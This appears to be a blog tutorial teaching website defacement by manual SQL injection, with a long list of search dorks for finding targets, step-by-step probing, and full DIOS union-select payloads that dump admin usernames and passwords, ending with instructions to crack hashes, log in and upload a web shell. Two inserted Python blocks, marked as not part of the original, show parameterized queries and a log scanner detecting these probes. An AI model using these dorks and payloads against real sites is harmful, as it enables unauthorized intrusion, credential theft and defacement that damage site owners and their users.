Monday, 23 September 2019

How to Deface: SQLi PoC With DIOS



Hi...!

This time I'm sharing some knowledge again, right..
About how to deface with a manual SQLi PoC...

Let's go straight to the tutorial, guys..
Check it out..

[#] Ingredients [#]
1. Dork (whether it's fresh or not depends on your face :v)

inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="
inurl:".php?man_code="
inurl:".php?marque="
inurl:".php?sec_id="
inurl:".php?history_cms.php?selectCat="
inurl:".php?ph="
inurl:".php?aid="
inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"

That's it for the dorks for now...
[NB .:: Develop them further, dude!! ::.]

2. Enough data quota (if you don't have any,
    use Wi-Fi)

3. Patience :v

4. Determination

5. Coffee, cigarettes (to stay chill)

6. Dios

[#] Step-by-Step Deface [#]

1. First, dork using the dorks above....

2. Pick a target site that looks vulnerable...
I'm using the site
http://www.sitetarget.co.li/news.php?id=1

3. Check whether it's vulnerable or not..
To do that, add a ' to the target..

Example::

http://www.sitetarget.co.li/news.php?id=1

It becomes..

http://www.sitetarget.co.li/news.php?id=1'

If it's vulnerable, something on the target site changes...
E.g.:: (Your SQL Syntax blah blah blah, a blank page, something changes...)

4. On to the ORDER BY..

http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
[NO ERROR]

We look for the error :v

http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
[STILL NO ERROR]
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
[STILL NO ERROR]

http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
[STILL NO ERROR]

http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
[HERE'S THE ERROR]

On to UNION SELECT (since we now know the number of columns...)

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-

There... the "pretty numbers" show up...
3 , 2
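
Why the quote and ORDER BY checks in steps 3 and 4 get a reaction from the site, and what makes them stop working, as an added example that is not part of the original post. Assumptions: an in-memory SQLite table stands in for the site's MySQL backend, and the 4-column news table and all function names are hypothetical.

```python
import re
import sqlite3

COLUMNS = "id, title, body, author"  # assumed 4-column layout, matching step 4

def make_db():
    # Constructed in-memory table; SQLite stands in for the site's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'Hello', 'First post', 'editor')")
    return db

def fetch_vulnerable(db, raw_id):
    # The parameter is pasted into the SQL text, so the parser sees it as SQL.
    try:
        return db.execute(f"SELECT {COLUMNS} FROM news WHERE id={raw_id}").fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"  # this text reaching the page is the visible change

def fetch_hardened(db, raw_id):
    # Reject anything that is not a plain integer, then bind it as a parameter:
    # the value is never parsed as SQL, so there is no syntax to break.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return db.execute(f"SELECT {COLUMNS} FROM news WHERE id=?", (int(raw_id),)).fetchall()

def compare(raw_id):
    # Run the same input through both query builders on a fresh database.
    db = make_db()
    return fetch_vulnerable(db, raw_id), fetch_hardened(db, raw_id)

if __name__ == "__main__":
    # The id values from steps 3 and 4, URL-decoded ('+' is a space).
    for probe in ["1", "1'", "1 order by 4-- -", "1 order by 5-- -"]:
        vulnerable, hardened = compare(probe)
        print(f"{probe!r:22} vulnerable={vulnerable!r}  hardened={hardened!r}")
```

With the bound parameter every probe returns an empty result and no database error, so the page gives no signal about column count. Error text should also be logged server-side rather than rendered.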

We put the DIOS in one of the pretty numbers that showed up..

(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

It ends up like this...

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-

Next..
We dump the admin's username and password
Like this..

(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)

This is how it ends up :v

http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-
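
What the requests above look like from the server side, as an added example that is not part of the original post: a small access-log scanner that flags the quote probe, the ORDER BY column count, UNION SELECT, and the versioned-comment and user-variable markers of the DIOS payload. The log lines, client addresses and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
VERSIONED = re.compile(r"/\*!\d*")  # MySQL versioned comment opener, e.g. /*!50000
RULES = {
    "quote_probe": re.compile(r"=[\w.-]*'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "user_var_assign": re.compile(r"@\w+\s*:="),
}

def classify(target):
    """Return the sorted names of the rules matching one request target."""
    query = unquote_plus(target.partition("?")[2])
    hits = set()
    if VERSIONED.search(query):
        hits.add("versioned_comment")
        # Unwrap /*!50000keyword*/ so the keyword rules see the bare keyword.
        query = VERSIONED.sub(" ", query).replace("*/", " ")
    hits.update(name for name, rx in RULES.items() if rx.search(query))
    return sorted(hits)

def scan(lines):
    """Map each client address to the set of rule names its requests triggered."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        hits = classify(m.group(2)) if m else []
        if hits:
            seen[m.group(1)].update(hits)
    return dict(seen)

# Constructed access-log lines (documentation addresses, abbreviated payload shape).
SAMPLE = [
    '198.51.100.7 - - [23/Sep/2019:10:00:00 +0700] "GET /news.php?id=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Sep/2019:10:01:02 +0700] "GET /news.php?id=1%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [23/Sep/2019:10:01:30 +0700] "GET /news.php?id=1+order+by+5--+- HTTP/1.1" 200 298',
    '192.0.2.10 - - [23/Sep/2019:10:02:11 +0700] "GET /news.php?id=1+union+select+1,2,'
    '(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),'
    '(information_schema.columns))x),4--+- HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for client, rules in scan(SAMPLE).items():
        print(client, sorted(rules))
```

A single client that trips several of these rules within minutes is the sequence this tutorial walks through; ordinary traffic to a numeric id parameter has no reason to contain versioned comments or information_schema.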

There you go..
The admin's username and password show up :D
Next, find the admin login page (adlog)
If there is one..
Just log in with the username and password we got earlier..
Sometimes.. the password has to be cracked first :v (passwords in the form of algorithms like MD5, MD4, MD2, SHA1, Base64 and many others)
Once you've logged in successfully..
Go straight to finding an upload spot.
Upload your pride-and-joy shell there..
Then access the shell you planted on the site...

That's all from me
[#] Mr.Kancil303 [#]

If I said anything wrong
I apologize >_<

[#] Happy Deface :D [#]
